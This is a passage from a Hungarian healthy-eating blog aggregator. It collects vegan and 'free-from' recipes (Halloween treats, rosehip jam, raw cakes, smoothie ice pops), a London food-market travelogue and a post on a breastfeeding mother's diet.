finom, így az est egész ideje alatt lehet belőle jóízűen falatozgatni. Megjegyzés: Próbáljunk meg olyan kemény sajtot választani, ami nem olvad szét túlzottan, mert akkor a gondosan összerakott pókjaink szétcsúsznak. Reszelt parmezánt is használhatunk. halloweeni csokis pók muffin (gluténmentes, laktózmentes) HALLOWEENI NAGYON CSOKIS PÓK MUFFIN HOZZÁVALÓK (kb. 12 db-hoz) - 75 g darált zabpehely (gluténérzékenyeknek szigorúan gluténmentes) - 75 g darált mandula /­­ mandula liszt - 3 ek jó minőségű sötét kakaó por - 80 g tetszés szerinti édesítőszer (pl.: barna nádcukor, nyírfacukor, eritrit stb.) -  1/­­2 tk szódabikarbóna - csipet Himalája só - 2 marék dió /­­ pekán dió - 100 g ét csokoládé - 100 g bio növényi margarin - 2 db érett banán - 2 db bio tojás dekorációhoz: - aszalt szilva, pók fejnek - fekete szívószál, pók lábaknak - fehér csokoládé, keresztnek a pók hátára ELKÉSZÍTÉSA szilárd hozzávalókat összekeverjük, és beleszórjuk a durvára vágott dió féléket. Egy edényben megolvasztjuk a margarint az összetördelt étcsokoládéval. A banánt leturmixoljuk a tojással, vagy csak villával összetörjük pépessé. A diós szilárd hozzávalókat összekeverjük a pépesített banános tojással, és a vajas folyékony ét csokoládéval. Fakanállal csomómentesre keverjük a muffin tésztát. Elővesszük a muffin sütőt, és beletöltögetjük a muffin papírba a tésztát. (Én még enyhén ki is szoktam kenni a papírokat belülről kókusz olajjal, hogy biztosan könnyedén le tudjam venni majd a kész süteményről.) 180 °c fokra előmelegített sütőben 25 perc alatt készre sütjük a nagyon csokis muffinokat. A szívószálak segítségével lábakat adhatunk a póknak, illetve egy kb. 1,5 cm-es szívószál darab segítségével rögzíthetjük a pók fejét is. Ehhez szükség lesz 1/­­2 db aszalt szilvára, amit felnyársalunk a szívószál darabkára, és beleszúrjuk a pók testbe, a muffinba. A fehér csokoládét gőz felett felolvasztjuk, és keresztet rajzolunk a pók testre. halloweeni kecskesajtos quinoával töltött paprika (gluténmentes, tojásmentes) HALLOWEENI KECSKESAJTOS QUINOA SALÁTA PAPRIKÁBA TÖLTVE HOZZÁVALÓK (6 db - hoz) - 6 db színes kaliforniai paprika - 1/­­2 bögre quinoa - 1 bögre tiszta víz - 150 g kecskesajt vagy görög feta sajt  - tetszés szerinti zöldségek pl.: 1 marék retek, 1/­­4 lila hagyma, 1/­­2 avokádó, 1 bögre előfözött kukorica, 2 szál újhagyma, 1 marék mungóbab csíra - 1 marék dió  Himalája só, frissen őrölt fekete bors - sörélesztőpehely (elhagyható) ELKÉSZÍTÉSA quinoát dupla mennyiségű vízben, a rizshez hasonlóan kifőzzük. Fajtától függően elég neki kb. 20 perc. A tetszés szerinti zöldségeket apróra felvágjuk, felkockázzuk a kecskesajtot, vagy feta sajtot, durvára vágjuk a diót, és összekeverjük az egészet egy kevés sóval és borssal. A kihűlt és megfőtt quinoát összekeverjük a zöldséges sajttal, és kész is a töltelék. A megmosott, színes paprikáknak levágjuk a tetejüket, úgy, hogy hozzáférjünk a belsejükhöz. Kézzel kiszedjük a magos csumát, és az ereket. Kitisztítjuk a paprika "fészket". Ha Halloweeni kinézetet szeretnénk, egy kicsi, de hegyes késsel faragjunk szemeket, szájat, és orrot a paprika "arcoknak".  A zöldséges, sajtos, quinoa tölteléket bele kanalazzuk a paprikákba, és már tálalhatjuk is a vendégek elé a Halloween-i asztalra.    Megjegyzés: A diót minden esetben fogyasztás előtt érdemes min. 24 órára beáztatni, hogy az emésztést gátló enzimgátlók kioldódjanak belőle. Sokkal egésszégesebb lesz így. halloweeni sütésmentes boszi ujjak (gluténmentes, laktózmentes, tojásmentes, hozzáadott cukormentes, nyers, vegán) HALLOWEENI BOSZI UJJAK HOZZÁVALÓKsötétbarna ujjak (kb. 10 db) - 100 g datolya  - 2 ek chia mag - 2 ek karob por - 2 ek kókuszolaj - darált mandula, amennyit felvesz (min. 50 g) - "köröm": vágott mandula szeletek világos ujjak (kb. 10 db) - 100 g datolya  - 1 db bio citrom reszelt héja (kezeletlen héjú) - 1/­­2 ek útifűmaghéj - 2 ek kókuszolaj - darált mandula, amennyit felvesz (min. 100 g) - "köröm": héjas egész mandula szemek ELKÉSZÍTÉSA datolyát előző éjjelre áztassuk be, hogy könnyebb legyen vele dolgozni, ne legyen olyan kemény. Amikor készítjük a receptet, tegyük az ázott, áztató víz nélküli datolyát a darálóba, és daráljuk meg egy kicsit. Datolya lekvár szerű állagot szeretnénk kapni. A hozzávalókat tegyük egy tálba a datolya "lekvárral", és kézzel gyúrjuk össze. A darált mandulát fokozatosan adjuk hozzá, annak függvényében, hogy mennyit vesz fel a tészta. A cél, egy gyurmázható, formázható állagú nyers tészta. Ha ezt elértük, sodorjunk a tenyerünkkel "ujj"-szerű rudakat, majd kézzel formázzunk bele ujj csontot. Amint elértük a kívánt külalakot, tegyük rá a "körmöt", majd mehetnek a sütésmentes, mindenmentes, édes, ehető ujjak a fagyasztóba. Fogyasztás előtt tegyük ki őket az asztalra, és kb. 30 perc alatt kiolvadnak, és már ehetőek is a bizarr harapnivaló ujjacskák. ;-)  Megjegyzés: Ha nincs Halloween, formázzunk a tésztákból golyókat, és így egész évben fogyasztható egyszerű édességeket kapunk, amit akár napokkal előtte elkészíthetünk, mert a fagyasztóban tárolva eláll.      halloweeni friss zöldségsaláta (gluténmentes, laktózmentes, tojásmentes, nyers, vegán) HALLOWEENI FRISS ZÖLDSÉGSALÁTA  (gluténmentes, laktózmentes, tojásmentes, nyers, vegán) Ez egy nagyon egyszerű zöldségsaláta, azoknak, akik valami frissre, és energiadúsra vágynak, a sok sok halloweeni nassolás között. Természetes és natúr ízek, hogy felfrissítsük kicsit a gyomrunkat. Önmagában, és köretként is fogyasztható. HOZZÁVALÓK - tetszés szerinti zöldségek pl.: jégsaláta, újhagyma, kígyó uborka, koktél paradicsom, retek, paprika, csíra, avokádó, cékla, alma stb. - tetszés szerinti natúr magok pl.: napraforgómag, tökmag, fenyőmag stb. - egyéb extra íz- és tápanyagérték fokozók pl.: sörélesztőpehely, kendermag stb. (elhagyható) -  - dekoráció: Sárgarépa töklámpás, és cukkini szellem ELKÉSZÍTÉSA tetszés szerinti zöldségeket tetszés szerinti méretben felaprítjuk, és összekeverjük. Törekedjünk színes salátát készíteni, és legyen benne lédús zöldség is (pl.: paradicsom.) Adjuk hozzá a tetszés szerinti magokat, vagy super ételeket. A sörélesztőpehely finom, sajtszerű zamatot kölcsönöz a salátáknak. Hagyjuk állni a hűtőben min. egy órát, hogy az ízek jól össze érjenek. Halloweeni hangulathoz készítsünk dekorációt a salátára. Vastagabb (nyers) sárgarépából vágjunk karikákat, és faragjunk belőle töklámpás arcokat. Nyers cukkiniből hosszábban vágjunk le kb. 10 cm hossz, és 0,5 cm magas lapokat. Faragjunk belőle szellemszerű formákat. halloweeni kecskesajtos quinoával töltött paprika TÁPLÁLKOZZUNK, NE CSAK ÉTKEZZÜNK, MÉG HALLOWEEN IDEJÉN IS! ;-)  Remélem sikerült néhány ötlettel megajándékozni titeket! A halloweeni formázások nélkül minden itt megjelent recept elkészíthető, hagyományos változatban, az év minden napján. Kellemes konyhatündérkedést, és vidám ünnepeket kívánok!   "A töklá mpás legendája Egy ír legenda szerint nevét egy Jack O'Lantern nevű részeges kovácsról kapta. A legenda szerint egy szép napon odament a részeges Jackhez az ördög és hívta a pokolba, de előtte felajánlotta, hogy igyanak még meg egy italt. Jack azonban nem akart vele tartani, ezért hát furfangos cselt eszelt ki. Ravasz módon megkérte, hogy válasszon egy almát az almafájáról, mire az ördög felmászott a fára. Jack tudta, hogy mitől fél az ördög, ezért a fa oldalára egy keresztet rajzolt. Az ördög nagyon megrettent a kereszttől és nem is mert lemászni, kénytelen volt a fa ágán kucorogni. Az ördög addig-addig egyezkedett a furfangos kováccsal, míg az megígértette vele, hogy ha leengedi a fáról, cserébe gondoskodik róla, hogy Jack (aki életében sok rosszat tett) ne kerüljön a pokolba. Jack ekkor megengedte hogy lemásszon a fáról az ördög - aki abban a pillanatban el is tűnt.  Azonban amikor Jack meghalt, lelke a menny és a pokol között rekedt: a mennybe nem engedték be, mivel élete során sokat részegeskedett és bűnös módon élt, de az ördög sem akarta a pokolba befogadni, mert nagyon haragudott Jackre a régi csínye miatt. Jack arra kérte az ördögöt, hogy legalább egy kis fényt adjon neki, hogy megtalálja a visszautat az élők világába. Végül az ördög megszánta és egy örökké izzó fadarabot dobott Jacknek a pokol katlana alatt lobogó tűz parazsából, amit nyugtalan lelkének szánt. Az izzó parazsat Jack egy kivájt takarmányrépa (rutabaga, svéd karórépa) belsejébe tette világító lámpásnak, s azóta lelke ennek a takarmányrépa-lámpácskának a fényénél keresi megnyugvását."  Forrás: Wikipédia töklámpás fesztivál

Londoni gasztroélményeim

2015. október 19. VegaLife 

Londoni gasztroélményeimHosszabb hallgatásomnak nyomós oka van, amit ezennel megtörök. Ahogy azt a (fehér)cukortól (általam hozzáadott más cukortól is) mentes meggylekvár írásom elején jeleztem, változás előtt álltunk, ami szeptember hónapban be is következett. A változás nem más, mint egy időre Londonba költöztünk, férjemmel itt próbálunk meg talpon maradni, élni, főzni, enni. Az itt ért (leginkább gasztro) benyomásokból szeretnék most egy képes beszámolót adni minden kedves olvasómnak. A képen a Hyde Park részlete látható. Londonban rengeteg park van. Bizonyára az egyik legzöldebb világváros. Még nem tudom, mennyi ideig leszünk ebben a városban, távlati célunk ugyanis egy kisebb (Budapestnél is kisebb) város lenne, például Bristol, vagy Brighton, de egyelőre most London-t kell megélnünk.  Mindenekelőtt el kell mondjam, hogy a legokosabb döntésem volt, kihozni magunkkal a turmixgépet (itt ugyanazt a típust láttam egy kirakatban, kb. 8.000 forinttal drágábban), piros fűszerpaprikát, hajdinát, zabot, stb. Nem bántam, hogy ezek által kevesebb ruha fért be a táskánkba, viszont nagyon szuper, hogy a turmixgépet tudom használni, és nem itt kell felkutatnom egy minőségit elfogadható áron. Zabot és hajdinát pedig egyszerűen sehol nem látok. (Zabpehely persze van.)  Mielőtt kijöttünk volna ide, az utolsó pénteken még kilátogattam a Bosnyák piacra, vettem egy-két finom hazai gyümölcsöt, s közben azon gondolkodtam, vajon itt, Londonban hogyan fogok boldogulni a nyers ételek beszerzésével. Valószínű, a legtöbb zöldség-gyümölcs import áruként kerül az országba (sajnos). London városában járva kelve láttunk néhány zöldségest, de igazibb piacot, ami otthon is van (pl. Fővám téren vagy az előbb említett Bosnyák téren) mindeddig kettőt sikerült úgy igazán felfedeznem. Az elsőt Whitechapel Station megállóból kijövet láttam meg, s hazafelé természetesen megálltam, s jól bevásároltam. A második pedig Dalston Junction megállónál van. Mindkét helyen már többször voltam, képeket is "hoztam". Az érdekessége e két piacos placcnak számomra az, hogy egyetlen overground járattal összekapcsolható a kettő. Igaz, egy kicsit gyalogolni kell, mert Dalston Junction-nál leszállva egy nagyobb saroknyi utat kell megtenni Dalston Kingsland-ig, amivel szemben helyezkednek el a kirakodók. Whitechapel Station közelében lévő árusoknál nagyon sok különleges dolgot láttam, amikről nem tudom pontosan, mi is az. (Ha bárki a képeken látja és be tudja azonosítani, írjon nyugodtan!) Sok jamaikai-t láttam arra, bár az is igaz, hogy a közelben van ugyanakkor a londoni muszlimok központja is, a kelet londoni mecsettel. Nagyon érdekelnek azok a növények, amelyeket lefotóztam, s Magyarországon nem igazán ismertek. Kíváncsi vagyok, milyen ételeket lehet belőlük készíteni, melyik nemzet konyhájának specialitásai. Szívesen megtanulnék egy-két vegán ételt más ízek hazájából. Időm egyelőre nem engedte, hogy az interneten felfedezzem a recepteket. Dalston Juction piacánál csak egy dolgot emelnék ki, hogy bizonyára több eladó árulja a portékát, mint Whitechapel-nél mivel akár 4 sort is alkotnak egymás mögött az árusok.  Mindkét helyen nem csak élelmiszert, hanem ruházatot, konyhai felszereléseket, fűszereket is árulnak. Dalston Kingsland piacán változó, hogy milyen árus van gyakrabban. Amikor csütörtökön jártam arra, akkor meglehetősen sok zöldséget, gyümölcsöt árusító "kofa" volt, pénteken pedig főként ruhákat árultak, csak kevés zöldséges volt. Szintén mindegyik helyen halas is van, elsősorban tengeri halakat láttam, bár annyira alaposan nem vettem szemügyre. Hentes árukat is be lehet szerezni, de ezek már boltokban vannak, amelyek fixen vannak nyitva, szinte minden nap. Whitechapel-nél láttam néhány üzletet, ahol a keleti világ édességeit árulják - a képeken ezeket is bemutatom. Bevallom, a pisztáciás zöld akármi kicsit érdekel. A városban másfelé járva szintén láttam ilyen boltokat, de még nem szakítottam időt arra, hogy megkérdezzem a bolti dolgozót, hogyan készül és miből van. Tartok tőle, hogy tele van cukorral... :( Magyar nyelvű útleírásokban, turista-információkban nem nagyon találkoztam ezzel a két hellyel, Borough Market-tel pedig annál inkább. Nos véleményem szerint a Borough Market valódi turistáknak való látványosság. Számomra inkább sznobizmus jut róla eszembe, no meg egyfajta gasztrofesztivál állandósított helye, de a hétköznapi bevásárláshoz minden bizonnyal nem a legjobb hely, főként egy vegán vagy vegetáriánus illetőnek. Azért is elsősorban turistáknak ajánlom, mert különlegesebb dolgokat lehet ott beszerezni, illetve a hely egy kisebb részén találhatunk friss zöldséget, gyümölcsöt, nagyobb területén inkább kész-ételt (sósat, édeset, pékárut, sajtféléket, borokat, olajokat, stb.) lehet vásárolni. Ezért gondolom róla azt, hogy egyfajta állandó gasztrofesztivál helyszíne. S hát igen, mi nem tartozunk azok közé, akiknek ez az árfekvés kedvező lenne. (Csak egy példa: répa, narancs és citromból helyben készített 100%-os 2.5 dl ital ára 2,5 font. Középárfolyamon egy font 420-430 forint, tehát a 2,5 dl ital ára cirka 1000 forint). Végezetül jöjjenek a képek, amelyek szerintem többet is elárulnak, mint amennyit én próbáltam összeállítani. :)    Whitechapel market: Cím: Whitechapel Rd Tower Hamlets London E1 5BS Nyitva tartás:  Hétfőtől szombatig 8:00-18:00 Gyümölcsök és zöldségek Whitechapel Market-on: Egy angol nyelvű vélemény Whitechapel Marketról (2010-ből, de ma is aktuális) az egyik, piacokról (is) szóló oldalról: "I dont understand why the other reviewers were so down on this lovely bit of commerce on Whitechapel.  Where else can you get a box of 10 mangoes for 3 pounds?  Maybe in Mexico, amigo.  But NOWHERE else in London.  Similarly, 3 bunches of coriander (AKA cllantro) for 1 pound?  Great prices on exotic foods.  And I bet you can bargain, though Ive never tried because things are so cheap already.   There are probably 50 stalls in this market, some selling lingerie, others selling fish, and others focusing on the bollywood dvd scene.  Its all good.  For cheap produce though, you cant beat it.   If youre more into the Borough market thing, go down there and drink your latte while you push your three-wheel stroller.  If youre more into good cheap food from nice folks (without the marketing) go to Whitechapel." Lényegében azt fejezi ki az írója, hogy nem érti, miért húzzák le ezt a pompás kis kereskedelmi helyet mások. Hol máshol tudsz egy doboznyi (10 db) mangót 3 fontért venni? Sehol máshol. Szerinte még talán alkudni is lehet, amire neki nem volt szüksége, mert minden olyan olcsó. Nagyjából 50 árusító hely van, s felsorolja, mi mindent lehet ott vásárolni. Végül azzal fejezi be mondandóját, ha többet akarsz tudni a Borough market-ről, menj csak el oda, idd meg a tejeskávédat, ..., de ha inkább érdekelnek az olcsó ételek a kedves helybéliektől, akik ráadásul nem is reklámozzák portékáikat, akkor menj Whitechapel-re! Az overground megállója kívülről és egyéb élelmiszerek:  Dalston Kingsland (Dalston Juction): Cím:  Kingsland High Street London E8 2JS Nyitvatartási időt nem tudok. (Lehet, hogy ez az overground alapban elmegy Kingsland megállóig, de eddig minden alkalommal Juction volt a végállomás, amikor Whitechapel felől közelítettem meg.)   Borough Market: Cím: 8 Southwark Street London SE1 1TL  London Bridge Nyitva tartás:  Hétfőtől szombatig 10:00-17:00   Pékáruk a Borough Market-en: Zöldségek, gyümölcsök, csonthéjasok ugyanitt:  Egyéb (kész)ételek:

Csipkebogyó lekvár (tartósítószer nélkül, akár cukormentesen)

2015. október 12. Fitt Nők 

Csipkebogyó lekvár (tartósítószer nélkül, akár cukormentesen)A móri bornapokon vásároltam egy házi csipkebogyó (hecsedli) lekvárt, ami annyira ízlett, hogy most jutottam el odáig, hogy ilyen nekem is kell. Valószínű, hogy eddig csak a bolti változatokat kóstoltam, mert eddig az agyonaromázott, agyonzselatinozott remegő kocsonyás változat eddig nem nagyon lógott ki a megszokott lekvár minőségű sorból. De most… ezzel a házi változattal egyből megváltozott a véleményem…. Isteni finom, és valóban az egyik legfinomabb lekvár. A főzés során a C vitamin tartalma sajnos sérül, de egyéb hőre nem érzékeny anyagok, pl. értékes színanyagjai megmaradnak. Tartósítószer hozzáadása nélkül készítettem. A csipkebogyó is saját szedésű. Néhányszor fennakadtam a bokron, ezért célszerű olyan ruhát választani a szedéséhez, amit nem sajnálunk. Előfordul ugyanis, hogy a tüskék kilyuggatják a textíliát. A csipkebogyó gyorsabb szedéséhez célszerű egy ollót is magunkkal vinni. A legédesebb, legfinomabb a dércsípte csipkebogyó, egy hátránya van, hogy akkor a bogyó megtisztítása nehezebb, mert már nem kemény bogyóval van dolgunk. Lekvár készíthető még kemény bogyóból is, az ízén csak kis mértékben érezhető a különbség. Plusz még talán a lekvár színe lesz kicsit halványabb éretlenebb, keményebb bogyó esetén. A beszerző kirándulás után a levadászott csipkebogyók mindkét végét levágjuk: a szára felőli oldalról is csippentünk egy picikét, és a fekete vége felől is. Sziszifuszi munka, és mivel elég piciny, nem túl szapora, így ülőgumóinkat előtte készítsük fel a hosszú feladatra. A végcsippentés után alaposan megmossuk a bogyókat (puha bogyó esetén jobb, ha előtte mosod meg)! Beletesszük a főzőedénybe, és annyi vizet öntünk rá, hogy ellepje. Puhára főzzük a bogyót. A puhára főtt bogyókat hagyjuk kicsit kihűlni, és egy turmixgépbe tesszük a pépesítés végett. Turmixgéppel simára keverjük. Lehet botmixerrel is, illetve lehet addig is főzni, míg az egész pépszerű massza lesz. Turmixolásnál adjunk még hozzá annyi vizet, amennyi szükséges ahhoz, hogy a turmixgép elbánjon vele. Vannak, akik szűrőkanálban passzírozzák, nekem az nem vált be, nagyon lassú megoldásnak látszott, és mivel a szűrőm is elég kicsi, nem vállalkoztam rá. Másik megoldásként a paradicsom passzírozó jött számításba, azonban ez nem vitte a magokat, túl nagyok voltak. Harmadik lehetőségként azokra a szűrőzsákokra gondoltam, amikkel a növényi tejeket szoktam szűrni, de ők eléggé sűrű szövésű textíliák voltak, így ezzel sem jutottam sokra. Sok fejtörés után a választás egy műanyag szúnyoghálószerűségre esett a választás. Egy tepsi tetejére terítettem, hogy oldalt lelógjon. Előnye volt a textíliával szemben, hogy nem süppedt bele az egész a lekvárba, remekül ki lehetett feszíteni a tepsi fölé. Így egy nokedliszaggatóval ezen passzíroztam át az átturmixolt pépet. A magoktól megfosztott pépet még egyszer visszaraktam a tűzre. Szinte folyamatosan kell kevergetni, hogy le ne égjen. A főzés befejezése előtt 10-15 perccel édesítjük (xilit, eritritol…. vagy cukor), és megkóstoljuk. Ha nem kellően pikáns, nem elég dércsípte még, pikánsabbá, savanykásabbá lehet tenni egy kis citromlé hozzáadásával. Cukorral/­­egyéb édesítővel is még forraljuk egy darabig, és üvegekbe töltjük. Ha az üvegek rendesen ki vannak mosva, és a kupakok is, nem kell bele tartósítószer. Én a kupakokat ki szoktam főzni forrásban lévő vízben. Fontos azonban, hogy ne deformálódjanak. A még forrásban lévő lekvárt egyenesen az üvegekbe töltöm, de az üveget és a kupakot még meggőzölöm a lekvár gőzével, és csak utána töltöm bele. Töltés után azonnal rácsavarom a tetőt, fejtetőre fordítom. Így elég nagy vákuum jön benne létre, úgyhogy ember legyen a talpán az, aki utána az egészről lecsavarja. Celofán nem kell!!!! Ez fontos, mert ott maradhat csöppnyi levegőrés, ahol levegőt kaphat és megromolhat. A fejtetőre fordított üvegeket száraz dunsztba tesszük. Jól betakargatjuk pokrócokkal, és addig ott tartjuk a melegben, míg teljesen ki nem hűl. Ez akár 2-3 nap, de akár több is lehet. Az eredmény egy teljesen sima, homogén, finom, pikáns, egészséges lekvár. Ha kihűlt, teljesen elkészültünk, mehet az éléskamra polcára. Egészségetekre! Bogyózásra fel!  

Datolyás almatorta

2015. szeptember 24. Éltető ételek 

Datolyás almatortaGyakran készítek nyers édességeket, ennek a tortának az elkészítése sem volt több 30 percnél. Persze érdemes a hűtőben pihentetni úgy 1-2 órát, utána szépen szeletelhető és fogyasztható is. Nem kell sütni, gluténmentes, cukormentes és vegán is. Szóval... szuper egészséges. Hozzávalók: Tészta: - 10 dkg áztatott/­­szárított dió - 10 dkg datolya - 5 dkg kókuszreszelék - 3 dkg darált arany lenmag - vaníliapor - fahéj Alma töltelék: - 50 dkg alma - 5 dkg datolya - 2 evőkanál útifűmaghéj - szegfűszeg - gyömbér - fahéj - vaníliapor Bevonat: - 10 dkg datolya - 1/­­2 banán - 2 evőkanál olvasztott kakaóvaj - 1/­­2 mokkáskanál szegfűszeg Elkészítése: - A datolyát áztassuk be úgy 1-2 órára, de csak éppen annyi vízben, hogy ellepje. Érdemes előtte kisebb darabokra felvágni a datolyát. - A tésztához a diót és a datolyát késes darálóval dolgozzuk homogénné. Gyúrjuk hozzá a többi hozzávalót is.  - Egy 18 cm-es tortaformába jó alaposan nyomkodjuk bele a tésztát. - Az almát mossuk meg (nem kell meghámozni), és magozzuk ki. Daraboljuk fel annyira, hogy még ne legyen pépes, kissé darabos maradjon. Adjuk hozzá a többi hozzávalót is. Tegyük rá a tésztára. - A harmadik réteghez mindent turmixoljunk össze, és mehet is az almás rétegre. - Tegyük be a hűtőbe pár órára.

Meggyes-mákos muffin

2015. szeptember 6. Vegavarázs 

Meggy helyett szőlővel vagy almával is elkészíthető. Hozzávalók: 25 dkg liszt 10 dkg nyírfacukor 1 kk szódabikarbóna 1 kk sütőpor 8 dkg darált mák egy csipet só 1 dl olaj 2-2,5 dl növényi tej egy marék kimagozott meggy (lehet cukormentes befőtt is) 1 citrom reszelt héja A lisztet egy tálba tesszük,...

Citromos keksztorta

2015. augusztus 19. Fittanyuka 

Citromos keksztorta    Ennek e süteménynek a receptjét a hagyományos sajt torta ihlette, amelynek nagyon finom a kekszalapú sütemény része. Gyakorlatilag ez egy sütés nélküli édesség amely a nyári hőségben nagy előny. A hagyományostól eltérően egy cukormentes és teljes őrlésű kekszet választottam. A Korpovit és a Detki keksz keverékéből készítettem el az alapot. Bármilyen friss, idény gyümölccsel feldobhatjuk a desszertünket. Hozzávalók: 250 g keksz vegyesen :Detki cukormentes és Korpovit 200 g kókuszolaj vagy bio margarin Krém:  200 ml kókusztejszín 300 ml víz Használhatunk a tejszín helyett 500 ml növényi tejet is. Tejszínnel készítve krémesebb az állag. 100 g eritrit 1/­­2 citrom reszelt héja és leve 3-4 evőkanál kukoricakeményítő késhegynyi őrölt bourbon vanília A kekszet összetörjük, vagy robotgépben morzsává daráljuk. A kókuszolajat vagy bio margarint megolvasztjuk és összekeverjük a kekszőrleménnyel. Egy kapcsos tortaforma (10-12 szeletes forma) aljára alaposan lenyomkodjuk a kekszes keveréket. Egy pohár aljával még alaposan elsimítjuk. Bármilyen formát használhatunk, én egy szögletes formát választottam most. Hűtőbe tesszük. Elkészítjük a krémet: A krém hozzávalóit hidegen csomómentesen elkeverjük és kis lángon főzni kezdjük állandó keverés mellett. Addig főzzük amíg besűrűsödik. Kissé állni hagyjuk, de még melegen ráöntjük a kekszalapra. Miután kihűlt visszahelyezzük a hűtőbe minimum egy óra hosszára. Szeletelés előtt a kapcsos pántot levesszük és kedvenc gyümölcsünkkel tálaljuk.  

Baba – Mama: Újszülött táplálás

2015. augusztus 6. Fittanyuka 

Baba  – Mama: Újszülött táplálás   Egy hetes a kisfiam és még nincs egy hete, hogy itthon vagyunk. A kórházban töltött napok összefolynak, gyorsan teltek és csak azt vártam, hogy otthon lehessünk saját környezetben. Az idillikus kép gyakran összetörik amint az újszülött és az anyuka hazakerül, mert elkezdődik a bébi táplálása amely tápszerrel vagy anyatejjel, vagy mindkettővel történik. Sok anyuka izgul, hogy minél gyorsabban elinduljon a tejtermelés. Első gyermekem anyatejes volt az első otthon töltött perctől és másfél éves koráig szoptattam, láttam az anyatejes táplálás számtalan pozitív hatását Vikinél az évek alatt, így nem kérdés számomra, hogy kisfiamat is így szeretném táplálni. Sok anyuka gyorsan feladja, pedig az első anyatej cseppekért “meg kell dolgozni”. Aki már tapasztalta az tudja, hogy ez egy fájdalmas folyamat, de mindenképpen megéri. Én már a kórházban azon “dolgoztam”, hogy elinduljon és szinte vártam, hogy kicsorduljon az első csepp. Köztudott, hogy a babákat ebben a pár napban tápszerrel egészítik ki az újszülött osztályon. Hiába a védőkrém és a szilikonvédő, a kisebesedést most sem úsztam meg, de kárpótolt, hogy minden nap egyre több és több tej képződött és összeszorított fogakkal szopiztunk. Itthon már a második napon csak anyatejet kapott és a fájdalmak is szűntek, tapasztalatból tudom, hogy hamarosan véget érnek. Tehát minden anyukát csak biztatni tudok, hogy tartson ki, mert az anyatej a legtökéletesebb táplálék a kicsik számára és nem mellékesen a legkényelmesebb (főleg a későbbiekben) módja az etetésnek. Tehát szopizunk az ő ritmusában, de köztudott, hogy a szoptatós anyukák számára nagyon nem mindegy, hogy mit fogyasztanak még vegyes táplálkozás esetén sem. Mi eddig jók vagyunk, nincsenek görcsök, jönnek a böfik és a szelek, viszonylag jól alszik. Táplálkozásomnál, mondhatni a tejserkentő “diétámnál” a következő szempontokat veszem figyelembe, először az általános dolgok: – nem fogyasztok túl fűszeres, füstölt, fokhagymás ételeket – kerülöm a “K” kezdőbetűs zöldségeket – nem iszom szénsavas vizet és üdítőket – cukrot, tejet, tojást, élesztős ételeket alapból nem fogyasztok, így természetes, hogy most sem. Könnyű a dolgom, mert nyár van és rengeteg finom, lédús, friss gyümölcs, zöldség áll rendelkezésünkre. Amiket fogyasztok: – napi minimum 4 liter víz és tea (édeskömény) – friss gyümölcsökből különböző turmixok, smoothiek – gazdag zöldséglevesek és nyers levesek – cukormentes müzlifélék, leginkább natúr zabpehely, barna kölesliszt, rizstejjel, aszalt gyümölcsökkel és kevés olajos magvakkal. – főzelékek friss idényzöldségekből, zabpehelylisztes, növényi tejszínes habarással – zöld turmixok különböző variációkban. – gazdag saláták, avokádó krémmel, rizsszelettel vagy élesztőmentes, pirított tönkölykenyérrel. Ami fontos szempont, hogy a turmixok készítésénél a gyümölcsök keverésénél is bőven használom az erjedésgátló fűszereket, hogy ne legyenek emésztési fennakadások, kellemetlenségek. Kedvencem a fahéj és a gyömbér. Este továbbra sem fogyasztom gyümölcsöket, ilyenkor a zöldségek dominálnak, a nap első és második felében pedig a gyümölcsöket vagy a belőlük készült turmixokat iszom. A nagy meleg miatt előfordul, hogy kimarad az ebéd, ilyenkor este fogyasztom el a leveseket, főzelékeket vagy salátákat. A nagy nyári meleg miatt jelenleg a táplálkozásom 70%-a nyers. Étkezések között pedig a tejszaporító és egyben görcsoldó, bio Neuner’s édeskömény teát. Nem mellékesen ez a fajta étrend segít kiüríteni a fölösleges vizet a testszövetekből amely a várandóság alatt felgyűlt.      

Vendégvárásra fel! - Házi készítésű, gyümölcs smoothie jégkrém és jégkása (gluténmentes, laktózmentes, tojásmentes, vegán, nyers)

2015. július 18. Zöld Avocado 

Vendégvárásra fel! - Házi készítésű, gyümölcs smoothie jégkrém és jégkása (gluténmentes, laktózmentes, tojásmentes, vegán, nyers) házi készítésű, gyümölcs smoothie jégkrém (mindenmentes, vegán, nyers) Telis tele van az Internet, jobbnál jobb, házi készítésű fagylalt és jégkrém receptekkel. Van köztük egyszerű gyümölcsös,  tejmentes a laktózérzékenyeknek, hozzáadott cukormentes, adalékanyagmentes, de akár luxus fagylaltokat is találhatunk, exkluzív hozzávalókkal (pl.:ehető aranypor). :-) Az elmúlt pár hétben, olyan sok fagylalt fényképet láttam, hogy még én is megkívántam ezt a klasszikus, hűsítő édességet, melyet több ezer éve fogyaszt már az emberiség. Itt a szeles Írországban, ahol jelenleg töltöm napjaimat, elég ritkán találkozik az ember azzal az érzéssel, hogy "hú, de meg ennék egy jó kis fagyit, hogy könnyebb legyen elviselni ezt a nagy meleget!" :-D  házi készítésű, gyümölcs smoothie jégkrém (mindenmentes, vegán, nyers) Aznap, amikor a gondolat végleg befészkelte magát a fejembe, hogy, készíteni kéne valami házi, gyümölcsös hűsítőt, másnapra vendégeket vártunk. Így hát elérkezettnek láttam az időt, hogy kipróbáljam ezt is! Persze lehetőleg vegán mindenmentesen, hogy minden vendégünk számára ehető legyen, és egyszerű, gyors formában, fagyi gép nélkül (mert az nincs itthon). Nézegettem a házi készítésű fagylaltok receptjeit, de semmi kedvem nem volt óránként kivenni a fagyasztóból, és újra meg újra összeturmixolni a fagyi krémet, hogy krémes maradjon. Vendégeket vártunk így, más ételek készítésére fordítottam inkább az időmet és energiámat...  "Jeges hűsítő kisokos a 100fok bloggereitől... gyümölcs smoothie jégkrém (vegán, nyers) Fagylalt: Gyümölcs-, kávé-, csokoládé- és más alapú mélyhűtött desszert, ízesíthető alkohollal. Többnyire tejjel, tejszínnel és tojássárgájával készítik, főzik. Jégkrém: Alapanyagokat tekintve nagyon hasonló a fagylalthoz. Lehet akár csak gyümölcsös alapú, de készülhet tejszínnel is és csokibevonattal. Formába öntve fagyasztjuk. Semifreddo: Ahogyan neve is jelenti, ez egy félig fagyasztott desszert, fagylalt torta vagy sütemény. Granita (jégkása): Olasz eredetű szemcsés textúrájú, kásás állagú, enyhén édesített, félig fagyasztott desszert. Egyszerű gyümölcsszirupból vagy kávéval, esetleg likőrrel ízesítve készül. Egyéb változatai készülhetnek zöldségből és friss fűszernövényekből is. Sorbet: Jeges desszert, amely nem tartalmaz zsíros anyagokat, tojássárgáját, így kevésbé szilárd és szemcsésebb az állaga a fagylaltnál. Alapanyaga gyümölcslé vagy gyümölcspép, de kerülhet bele bor, pezsgő, 